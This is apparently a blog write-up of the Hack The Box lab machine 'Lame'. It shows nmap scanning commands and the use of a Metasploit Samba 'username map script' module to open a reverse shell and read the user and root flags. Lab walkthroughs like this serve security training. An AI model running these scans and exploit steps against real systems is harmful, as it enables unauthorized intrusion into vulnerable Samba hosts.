![Cover image for [HTB] Machine - Lame](https://media2.dev.to/dynamic/image/width=1000,height=420,fit=cover,gravity=auto,format=auto/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dcmt7so3gk061n3avcqs.png)
Step 1: preparation
- Connect to the VIP HTB VPN
- Add $IP variable to shell for faster operation
IP=10.10.X.X echo $IP Step 2: enumeration
I first start with a basic nmap scan
nmap $IP This scan returns Host seems down. If it is really up, but blocking our ping probes, try -Pn
So I try with the related flag
nmap -Pn $IP And it returns that 4 ports are available
Given that, I make a more precise (and longer) scan
nmap -Pn -sV -sC $IP 
I can see that vsFTPd is on version 2.3.4 and samba is on version 3.0.20.
It should be enough for exploitation.
Step 3: exploitation
Samba 3.0.20
A little search on the msfconsole give me a result nammed Samba "username map script" Command Execution.
I so use this module and check which options are available
msf > use 0 msf > show options 
The RHOSTS is empty and requiered, so I set it up
msf > set RHOSTS $IP (replace $IP with the real target IP) NOTE: The LHOST need to be setted up with the HTB VPN TUN interface, not your local IP.
And then I launch the exploit
msf > exploit 
I am now in a reversed shell!
cd home ls - ftp - makis - service - ... cd makis ls - user.txt cat user.txt The user flag is done.
For root, I come back the root of the shell, I navigate to the root folder and I get the root.txt file.
Step 4: that's it
If you want to subscribe to the HackTheBox Academy, you can use my referral link!
Top comments (0)